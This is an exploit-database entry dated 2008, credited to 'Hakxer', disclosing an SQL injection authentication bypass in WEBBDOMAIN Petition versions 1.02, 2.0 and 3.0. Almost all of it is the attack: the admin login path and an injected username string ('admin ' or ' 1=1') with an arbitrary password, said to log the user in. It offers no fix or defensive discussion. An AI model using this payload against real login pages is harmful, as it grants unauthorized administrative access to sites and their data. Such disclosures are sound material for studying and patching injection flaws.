id: 4060
date: 11/04/2008
title: WEBBDOMAIN Petition 1.02/2.0/3.0 (SQL Injection) Auth Bypass Vuln
author: Hakxer
cves: 

=================================================================
WEBBDOMAIN Petition 1.02/2.0/3.0 (SQL Injection) Auth Bypass Vuln
=================================================================


# [~] Discovered by : Hakxer
# [~] Type Gap : WEBBDOMAIN Petition Auth Bypass
# [~] Script :http://webbdomain.com/php/petition/petition.php
# [~] Greetz : Allah
##########################################################################

|| Auth Bypass ||

http://webbdomain.com/php/petition/admin/

Username : admin ' or ' 1=1
password : Hakxer

Logged In ...

#  Proud To be a Muslim #
#_=END=_#



#  0day.today [2023-03-25]  #